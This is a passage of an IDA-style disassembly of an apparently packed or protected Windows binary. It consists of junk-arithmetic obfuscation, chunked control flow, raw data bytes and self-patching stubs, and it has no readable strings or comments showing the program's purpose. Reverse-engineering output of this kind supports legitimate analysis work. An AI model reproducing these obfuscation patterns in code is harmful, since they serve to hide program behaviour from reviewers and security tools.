		sub	al, 99h
		push	offset sub_44AC77
		jmp	nullsub_415
; END OF FUNCTION CHUNK	FOR sub_44B0D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CBDE

loc_43CBAC:				; CODE XREF: sub_458A74-1B53Dj
					; sub_43E03C+2j ...
		jmp	sub_44132A
; ---------------------------------------------------------------------------

loc_43CBB1:				; CODE XREF: sub_43CBDE+Aj
					; sub_458A74-C202j
		xchg	edi, [esp+0]
		mov	ecx, edi
		pop	edi
		jmp	loc_445BB3
; END OF FUNCTION CHUNK	FOR sub_43CBDE
; ---------------------------------------------------------------------------

loc_43CBBC:				; CODE XREF: y2kk37jd:00444A0Aj
		jb	sub_444825
		pop	edx
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_43CBC3:				; CODE XREF: y2kk37jd:loc_43C6C0j
					; sub_44753E-3715j
		push	esi
		push	7F3DBED0h
		pop	esi
		rol	esi, 3
		xor	esi, 58B77750h
		test	esi, 80h
		jmp	loc_45498C
; END OF FUNCTION CHUNK	FOR sub_44753E

; =============== S U B	R O U T	I N E =======================================



sub_43CBDE	proc near		; CODE XREF: sub_44EC21:loc_43BA82p
					; y2kk37jd:0043BC5Cj

; FUNCTION CHUNK AT 0043CBAC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043CF27 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445BB3 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044859C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454D8D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455A15 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00455CC9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456318 SIZE 00000012 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43CBB1
		jmp	loc_44859C
sub_43CBDE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_43CBF3:				; CODE XREF: sub_43F75D:loc_44B8B5j
		pop	eax
		and	eax, ds:4000F2h
		rol	eax, 1Eh
		or	eax, 7A48F435h

loc_43CC03:				; CODE XREF: sub_43ED19:loc_440667j
		rol	eax, 10h
		add	eax, 74FCE322h
		jmp	loc_45496F
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_43CC11:				; CODE XREF: sub_4448E2:loc_44FB46j
		mov	al, [eax]
		jnz	loc_44B607
		sub	al, 99h
		mov	edx, [ebp+var_4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_4552E3
		jmp	loc_45A6DE
; END OF FUNCTION CHUNK	FOR sub_4448E2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_217. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_43CC2E:				; CODE XREF: sub_44B0D0+D311j
		jmp	loc_43CE7A
; END OF FUNCTION CHUNK	FOR sub_44B0D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_43CC33:				; CODE XREF: sub_44001E:loc_447AEAj
		inc	dword ptr [ebp-28h]
		mov	eax, [ebp-28h]
		mov	byte ptr [eax],	0

loc_43CC3C:				; CODE XREF: y2kk37jd:loc_44E863j
		inc	dword ptr [ebp-24h]
		jmp	loc_45A797
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF5F

loc_43CC44:				; CODE XREF: sub_43BF5F+Fj
		inc	dword ptr [ebp-24h]
		jmp	loc_43B8A8
; END OF FUNCTION CHUNK	FOR sub_43BF5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447977

loc_43CC4C:				; CODE XREF: sub_44479B-71EFj
					; sub_44753E-370Dj ...
		mov	eax, [ebp-10h]
		mov	esp, ebp
		jmp	loc_4542A8
; END OF FUNCTION CHUNK	FOR sub_447977
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43CC56:				; CODE XREF: sub_445226:loc_445369j
		sub	eax, 0F1149A68h
		rol	eax, 0Eh
		mov	ds:dword_45B410, eax

loc_43CC65:				; CODE XREF: sub_442829+C0BBj
					; sub_442829:loc_45624Bj
		ror	eax, 0Eh
		sub	eax, 0EEB6598h
		jmp	loc_457021
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_43CC73	proc near		; CODE XREF: y2kk37jd:004400E2j
					; sub_44F896+Dp
		xchg	eax, [esp+0]
		pop	eax
		pop	ecx
		and	edx, 884E47BBh
		rol	edx, 10h
		jmp	loc_43F31C
sub_43CC73	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450203

loc_43CC86:				; CODE XREF: sub_450203+Ej
		push	offset loc_4525D6
		jmp	sub_44EAF8
; END OF FUNCTION CHUNK	FOR sub_450203
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD8D

loc_43CC90:				; CODE XREF: sub_45AD8D:loc_43DEF3j
		mov	edi, esi
		pop	esi
		and	edi, 86FE8D6Bh
		xor	edi, 4D88A0EFh
		add	edi, 34EA5474h
		xchg	edi, [esp-4+arg_0]
		jmp	loc_447D5F
; END OF FUNCTION CHUNK	FOR sub_45AD8D
; ---------------------------------------------------------------------------

loc_43CCAD:				; DATA XREF: sub_4458DD+5CD2o
		xchg	edx, [esp]
		push	eax
		jns	loc_456E08
		push	ebx
		push	510FAABDh
		pop	ebx
		rol	ebx, 15h
		jmp	loc_45758B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43CCC6:				; CODE XREF: sub_445226+835Dj
		mov	[ebp-10h], eax
		cmp	dword ptr [ebp-10h], 0
		jz	loc_458FB4
		jmp	loc_4489F1
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_156. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43CCD9:				; CODE XREF: y2kk37jd:loc_43CAC3j
		jz	loc_43EA07
		jmp	loc_43F47E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_43CCE4:				; CODE XREF: sub_4411C3:loc_4431C8j
		jz	loc_458A53
		jmp	loc_44065C
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------

loc_43CCEF:				; CODE XREF: y2kk37jd:004438BEj
		jns	loc_44FB17
		shr	esi, 4

loc_43CCF8:				; CODE XREF: y2kk37jd:loc_441FE7j
		sub	edx, 0CD653FA6h
		xor	edx, 7C983504h
		jmp	loc_44E93E
; ---------------------------------------------------------------------------

loc_43CD09:				; CODE XREF: y2kk37jd:0045A2A7j
		or	ebx, 0BC6AC47Bh
		add	ebx, 7793E94Eh
		or	ebx, ds:4000E9h
		jnz	loc_45606D
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_43CD21:				; CODE XREF: sub_44594E+FA6Cj
		jmp	loc_45370F
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_43CD26:				; CODE XREF: sub_44B814:loc_44B826j
		jmp	loc_44D38F
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------

loc_43CD2B:				; CODE XREF: y2kk37jd:0045319Dj
		mov	esi, 2EB299D6h
		push	0F68C6A08h
		pop	eax
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_43CD36:				; CODE XREF: sub_44C304:loc_45318Bj
		push	offset loc_44C8CD
		jmp	nullsub_343
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
		mov	ds:dword_41E058, eax
		lea	eax, nullsub_23
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_23
; ---------------------------------------------------------------------------
		call	nullsub_442
		jmp	ds:dword_41E05C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43CD5F:				; CODE XREF: sub_453867-6D1Bj
		jmp	loc_44A881
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_43CD64:				; CODE XREF: y2kk37jd:004404B6j
		jmp	loc_44D20E
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_44F9E0
		jmp	loc_45A269
; ---------------------------------------------------------------------------

loc_43CD76:				; CODE XREF: y2kk37jd:00454FFEj
		jns	loc_45B04C
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_43CD7C:				; CODE XREF: sub_45B7AA:loc_454FE8j
		or	edx, 0BD02731Eh
		add	edx, 4277ECA5h
		xchg	edx, [esp+0]
		jmp	loc_43DFDF
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_316. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_43CD91:				; CODE XREF: sub_44CDD5-153Aj
		jmp	loc_43FB1D
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------

loc_43CD96:				; CODE XREF: y2kk37jd:0043D719j
		shr	eax, 4

loc_43CD99:				; CODE XREF: y2kk37jd:loc_4529F5j
		mov	eax, [esp]
		call	sub_44AD49

loc_43CDA1:				; CODE XREF: y2kk37jd:00448FA3j
					; y2kk37jd:004573B0j
		xchg	eax, [esp]
		mov	edx, eax
		call	sub_4581BB
		jmp	loc_44B1B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B86B

loc_43CDB0:				; CODE XREF: sub_44B86B:loc_4405DFj
		push	0DF8BF890h
		pop	edi
		sub	edi, 0F0CAE6F4h
		and	edi, 0A12E19C7h
		xor	edi, 0C1975FB9h
		and	edi, 0C721BFAAh
		jns	loc_454C43

loc_43CDD4:				; CODE XREF: y2kk37jd:004501D0j
		jmp	nullsub_65
; END OF FUNCTION CHUNK	FOR sub_44B86B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43CDD9:				; CODE XREF: sub_445226+5Bj
		jmp	loc_444289
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	ebx, esi
		jmp	loc_4506A2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_403. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454433

loc_43CDE6:				; CODE XREF: sub_454433-77B2j
		jmp	sub_456990
; END OF FUNCTION CHUNK	FOR sub_454433
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552EB

loc_43CDEB:				; CODE XREF: sub_4552EB-13064j
		jmp	loc_452F2F
; END OF FUNCTION CHUNK	FOR sub_4552EB
; ---------------------------------------------------------------------------

loc_43CDF0:				; CODE XREF: y2kk37jd:004469C4j
		jnz	loc_455AE3
		or	ecx, edi
		add	esi, eax
		jmp	loc_455AE3
; ---------------------------------------------------------------------------
		test	ebp, 6BD35BC8h
		jmp	loc_45BF28
; ---------------------------------------------------------------------------
		push	eax
		mov	eax, esp
		push	ebx
		mov	ebx, esi
		xchg	ebx, [esp]
		push	3C79CFAEh
		pop	esi
		add	esi, 0AEB40C07h
		jmp	loc_447A94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_43CE24:				; CODE XREF: sub_43F75D:loc_44EA8Cj
		pop	eax
		adc	ecx, 5E42A5D1h
		add	esi, ecx
		or	ebp, 618C1E33h
		jmp	loc_4440CC
; END OF FUNCTION CHUNK	FOR sub_43F75D

; =============== S U B	R O U T	I N E =======================================



sub_43CE38	proc near		; CODE XREF: y2kk37jd:0043DFEAj
					; sub_453AF7+5p

; FUNCTION CHUNK AT 0045719C SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	esi
		push	offset sub_43D2FC
		jmp	loc_45719C
sub_43CE38	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_43CE47:				; CODE XREF: sub_44346B:loc_456834j
		pop	ecx
		and	ecx, 325A1B0h
		sub	ecx, 0A7EA83DDh
		cmp	ecx, 426E1723h
		jmp	loc_45BFBF
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------
		db  5Eh	; ^
		db  81h	; 
		db 0CEh	; 
		db 0B8h	; 
		db  5Ah	; Z
		db  86h	; 
		db  3Ah	; :
		db  81h	; 
		db 0C6h	; 
		db 0FFh
		db  54h	; T
		db  8Dh	; 
		db    4
		db  87h	; 
		db  34h	; 4
		db  24h	; $
		db 0E9h	; 
		db  8Ah	; 
		db 0A9h	; 
		db    1
		db    0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_215. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43CE75:				; CODE XREF: y2kk37jd:0044BA60j
		jmp	loc_44429B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_43CE7A:				; CODE XREF: sub_44B0D0:loc_43CC2Ej
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44F2EC
		jmp	loc_4433F3
; END OF FUNCTION CHUNK	FOR sub_44B0D0
; ---------------------------------------------------------------------------

locret_43CE89:				; CODE XREF: y2kk37jd:loc_4522CCj
		retn
; ---------------------------------------------------------------------------

loc_43CE8A:				; CODE XREF: y2kk37jd:0044C522j
		jmp	loc_45113B
; ---------------------------------------------------------------------------

loc_43CE8F:				; CODE XREF: y2kk37jd:0044127Aj
		jmp	loc_4488F2
; ---------------------------------------------------------------------------

loc_43CE94:				; CODE XREF: y2kk37jd:00447235j
					; y2kk37jd:00458125j
		or	ebx, 0AFB90BADh
		rol	ebx, 1Eh
		add	ebx, 90551DABh
		xchg	ebx, [esp]
		jmp	sub_45C4C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4497B0

loc_43CEAB:				; CODE XREF: sub_4497B0+25j
		xchg	ebx, [esp+0]
		jmp	nullsub_173
; END OF FUNCTION CHUNK	FOR sub_4497B0
; ---------------------------------------------------------------------------

loc_43CEB3:				; DATA XREF: sub_457533:loc_44B13Ao
		xchg	ebx, [esp]
		jmp	loc_45272C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_43CEBB:				; CODE XREF: sub_454C24:loc_43DE24j
					; sub_454C24+3ACFj
		push	0FAC447CEh
		xchg	edx, [esp+4+var_4]
		mov	eax, edx
		pop	edx
		or	eax, 1F5210BEh
		and	eax, 589786D2h
		sub	eax, ds:4000E8h
		jmp	loc_45C119
; END OF FUNCTION CHUNK	FOR sub_454C24
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_166. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_43CEDE:				; CODE XREF: sub_448CAE-A706j
		jmp	loc_45179B
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D61E

loc_43CEE3:				; CODE XREF: sub_43D61E:loc_457A6Dj
		mov	eax, 19EDC823h
		push	edi
		push	78CC6548h
		pop	edi
		xor	edi, 0DCDBD857h
		add	edi, 0F97FA42Dh
		jmp	loc_44586A
; END OF FUNCTION CHUNK	FOR sub_43D61E
; ---------------------------------------------------------------------------
		mov	edx, 19EDC823h
		call	sub_440CD1
		push	eax
		push	33D43049h
		pop	eax
		and	eax, 2F70BFFh
		jmp	loc_455E7A

; =============== S U B	R O U T	I N E =======================================



sub_43CF1C	proc near		; CODE XREF: sub_41A889+2Ep
					; sub_43CF1C+5j
					; DATA XREF: ...
		call	sub_43CF31
		jmp	ds:off_41E03C
sub_43CF1C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CBDE

loc_43CF27:				; CODE XREF: sub_43CBDE+B9C4j
		jmp	loc_454D8D
; END OF FUNCTION CHUNK	FOR sub_43CBDE
; ---------------------------------------------------------------------------

loc_43CF2C:				; CODE XREF: y2kk37jd:00441E7Ej
		jmp	loc_4414B3

; =============== S U B	R O U T	I N E =======================================



sub_43CF31	proc near		; CODE XREF: sub_43CF1Cp
					; sub_4593F8-18EB9j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440544 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004437DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045882F SIZE 00000005 BYTES

		jnz	loc_440544
		push	offset loc_43F6A6
		jmp	loc_45882F
sub_43CF31	endp

; ---------------------------------------------------------------------------

loc_43CF41:				; CODE XREF: y2kk37jd:0045AC40j
		popf

; =============== S U B	R O U T	I N E =======================================



sub_43CF42	proc near		; CODE XREF: y2kk37jd:00447D94p

; FUNCTION CHUNK AT 00458616 SIZE 0000000D BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		div	ecx
		mov	[ebp-18h], edx
		jmp	loc_458616
sub_43CF42	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43CF50:				; CODE XREF: sub_445226+9DE7j
		push	ecx
		call	sub_446303

loc_43CF56:				; CODE XREF: sub_4580C5+1364j
		jmp	loc_4416DD
; ---------------------------------------------------------------------------

loc_43CF5B:				; CODE XREF: sub_445226-606Dj
		or	ebp, eax
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_43CF5D:				; CODE XREF: sub_445226:loc_43C547j
					; sub_445568-3C20j ...
		jnb	loc_44E12B
		cmp	[ebp+var_4], 6
		jnz	loc_4511CF
		jmp	loc_455482
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_43CF72:				; CODE XREF: y2kk37jd:0044A65Bj
		jg	loc_444014
		popf
		add	ecx, 4D423909h
		sbb	esi, 0BDB020DDh

loc_43CF85:				; CODE XREF: y2kk37jd:loc_444D01j
		push	0AD1DE8EDh
		pop	eax
		jmp	loc_4466B6
; ---------------------------------------------------------------------------
		mov	eax, 2DC123E0h
		call	sub_442C3E
		mov	ds:off_41E124, eax
		lea	eax, sub_444899
		push	offset loc_44CCB5
		jmp	loc_4469F9
; ---------------------------------------------------------------------------
		mov	eax, 0DA76E35Ch
		xchg	edx, ebp
		jmp	sub_43C06A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43CFBC:				; CODE XREF: sub_445226:loc_43C0E5j
		jge	loc_4486C7
		pushf
		jmp	loc_45A3F3
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E049

loc_43CFC8:				; CODE XREF: sub_43E049:loc_442C32j
		jl	loc_450269
; END OF FUNCTION CHUNK	FOR sub_43E049
; START	OF FUNCTION CHUNK FOR sub_44A8B6

loc_43CFCE:				; CODE XREF: sub_44A8B6-DFA9j
		jmp	nullsub_91
; END OF FUNCTION CHUNK	FOR sub_44A8B6
; ---------------------------------------------------------------------------
		mov	ebx, 0E2853986h
		jnb	loc_4428DD
		jmp	loc_450267
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_43CFE3:				; CODE XREF: sub_43F8B8+11F80j
		shl	edx, 1Ch
		test	ecx, eax
		jmp	loc_44F463
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43CFED:				; CODE XREF: sub_453867+41Dj
		jnz	loc_45AF6F
		not	ecx

loc_43CFF5:				; CODE XREF: sub_453867:loc_443D89j
		call	nullsub_20
		retn
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_43CFFB:				; CODE XREF: sub_43BF31+1C999j
		jmp	loc_44A70C
; END OF FUNCTION CHUNK	FOR sub_43BF31
; ---------------------------------------------------------------------------

loc_43D000:				; CODE XREF: y2kk37jd:00448C66j
		jmp	loc_45602C

; =============== S U B	R O U T	I N E =======================================



sub_43D005	proc near		; CODE XREF: sub_43E0F3+18j
					; sub_4493D7p ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00449701 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E454 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458C39 SIZE 00000020 BYTES

		jno	loc_44E454
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		push	edx
		jmp	loc_449701
sub_43D005	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_43D016:				; CODE XREF: sub_43F8B8+F7F4j
		jp	loc_442E3A
		cmp	ebp, 6FB9970Eh
		jmp	loc_43BC2A
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AFC4

loc_43D027:				; CODE XREF: sub_45AFC4-1D39Fj
		jl	loc_45AF8D
; END OF FUNCTION CHUNK	FOR sub_45AFC4
; START	OF FUNCTION CHUNK FOR sub_4468E0

loc_43D02D:				; CODE XREF: sub_4468E0+CD8Aj
		jmp	sub_4468E0
; END OF FUNCTION CHUNK	FOR sub_4468E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B55D

loc_43D032:				; CODE XREF: sub_44B55D+7A8Aj
		jmp	loc_453B8A
; END OF FUNCTION CHUNK	FOR sub_44B55D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F0C

loc_43D037:				; CODE XREF: sub_440F0C-3C0j
		jmp	loc_44A63D
; END OF FUNCTION CHUNK	FOR sub_440F0C
; ---------------------------------------------------------------------------
		jge	loc_454460
		xchg	edi, [edx]
		test	ebp, ecx
		jmp	loc_443E64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B24F

loc_43D04B:				; CODE XREF: sub_44B24F:loc_4492E1j
		add	esi, 682C36AFh
		push	offset loc_45A66E
		jmp	nullsub_62
; END OF FUNCTION CHUNK	FOR sub_44B24F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DD9

loc_43D05B:				; CODE XREF: sub_458DD9+1Fj
		jge	loc_4472A0

loc_43D061:				; CODE XREF: y2kk37jd:0045296Aj
		jmp	loc_43DBA3
; END OF FUNCTION CHUNK	FOR sub_458DD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_43D066:				; CODE XREF: sub_44B814+1B81j
		jmp	loc_448AEC
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
		push	0D1886406h

loc_43D070:				; CODE XREF: y2kk37jd:loc_448153j
		or	edx, 748B4F87h
		jmp	loc_4472A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_43D07B:				; CODE XREF: sub_4447EA:loc_4421BDj
		rol	ebx, 0Ah
		jmp	loc_4463D5
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_43D083:				; CODE XREF: sub_4440AB+7495j
		jnb	loc_458426
		jmp	loc_455F7E
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------

loc_43D08E:				; CODE XREF: y2kk37jd:0044D001j
		mov	eax, [ebp-4]
		call	sub_451C7D
; START	OF FUNCTION CHUNK FOR sub_43CA5B

loc_43D096:				; CODE XREF: sub_43CA5B+B418j
		jmp	loc_43C7A5
; END OF FUNCTION CHUNK	FOR sub_43CA5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_43D09B:				; CODE XREF: sub_44753E-137Aj
		jmp	sub_440EC8
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_43D0A0:				; CODE XREF: sub_43C851+6600j
		jmp	loc_457CCF
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4587BA

loc_43D0A5:				; CODE XREF: sub_4587BA+Aj
		call	sub_44113A
		mov	ds:off_41E034, eax
		lea	eax, sub_441F30
		mov	byte ptr [eax],	0C3h
		jmp	sub_441F30
; END OF FUNCTION CHUNK	FOR sub_4587BA

; =============== S U B	R O U T	I N E =======================================



sub_43D0BE	proc near		; CODE XREF: sub_41AB0C+284p
					; sub_41AB0C+2B2p ...
		call	sub_43D0C9
		jmp	ds:off_41E038
sub_43D0BE	endp


; =============== S U B	R O U T	I N E =======================================



sub_43D0C9	proc near		; CODE XREF: sub_43D0BEp
					; sub_445226+2F28j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004595AC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00459B94 SIZE 00000010 BYTES

		jns	loc_4595AC
		xchg	eax, [esp+0]
		jmp	loc_459B94
sub_43D0C9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EB56

loc_43D0D7:				; CODE XREF: sub_44EB56:loc_4476CBj
		jl	loc_451AFF
		jbe	loc_4536F7
		test	ebp, 496FC13Dh
		jmp	loc_451AF9
; END OF FUNCTION CHUNK	FOR sub_44EB56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_43D0EE:				; CODE XREF: sub_443AA7:loc_43DA3Ej
		sbb	edi, 6A3B2D0Fh
		jmp	loc_43E3A4
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_43D0F9:				; CODE XREF: sub_4411C3:loc_440C0Aj
		jz	loc_45AD84
		mov	eax, [esp+4+var_4]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+0]
		push	esi
		jmp	loc_446093
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------

locret_43D10E:				; CODE XREF: y2kk37jd:loc_458E08j
		retn
; ---------------------------------------------------------------------------

loc_43D10F:				; CODE XREF: y2kk37jd:loc_45A217j
		adc	ecx, 0F5DA2657h
		jmp	loc_440AF9
; ---------------------------------------------------------------------------

loc_43D11A:				; DATA XREF: sub_454C24:loc_444E32o
		add	eax, edi
		add	al, ah
		and	eax, 7
		push	ebx
		push	0FD2C1712h
		jmp	loc_447B1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459EC3

loc_43D12C:				; CODE XREF: y2kk37jd:004527A9j
					; sub_459EC3+17j
		add	esi, 0B532E858h
		or	esi, 92B1700Bh
		add	esi, 28080B75h
		popf
		call	sub_4521FC
; END OF FUNCTION CHUNK	FOR sub_459EC3
; START	OF FUNCTION CHUNK FOR sub_44B8EE

loc_43D144:				; CODE XREF: sub_44B8EE+Cj
		jmp	nullsub_66
; END OF FUNCTION CHUNK	FOR sub_44B8EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43D149:				; CODE XREF: sub_445226:loc_455953j
		jnz	loc_441AD2
		jmp	loc_44890D
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_43D154:				; CODE XREF: sub_456809-F3EBj
		jo	loc_44AE2F

loc_43D15A:				; CODE XREF: sub_456809:loc_443864j
		lea	eax, [ebp-800h]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+8+var_8]
		jmp	loc_4505D6
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_43D16B:				; CODE XREF: sub_449DFE+9j
		push	edi
		push	0FA0BDB3Ah
		pop	edi
		or	edi, 9696BB6Eh
		add	edi, 5AC57F33h

loc_43D17E:				; CODE XREF: y2kk37jd:00455B66j
		add	edi, ebp
		add	edi, 0A69A854Bh
		jmp	loc_451C92
; END OF FUNCTION CHUNK	FOR sub_449DFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_43D18B:				; CODE XREF: sub_43F911+698Aj
		jg	loc_43C8B8
		test	edi, 4DE6740Bh
		jmp	loc_4494D1
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E19

loc_43D19C:				; CODE XREF: sub_446E19+92B6j
					; sub_446E19:loc_453459j
		push	edi
		push	0DD3EF278h
		pop	edi
		add	edi, 366D7A2h
		and	edi, ds:4000E9h
		add	edi, 0DFA35809h
		jmp	loc_45BAEB
; END OF FUNCTION CHUNK	FOR sub_446E19
; ---------------------------------------------------------------------------

loc_43D1BA:				; CODE XREF: y2kk37jd:004561C2j
		shr	ebx, 0Ah

; =============== S U B	R O U T	I N E =======================================



sub_43D1BD	proc near		; CODE XREF: sub_44A3E7+ADB0p

; FUNCTION CHUNK AT 00440F39 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444413 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00449E16 SIZE 00000005 BYTES
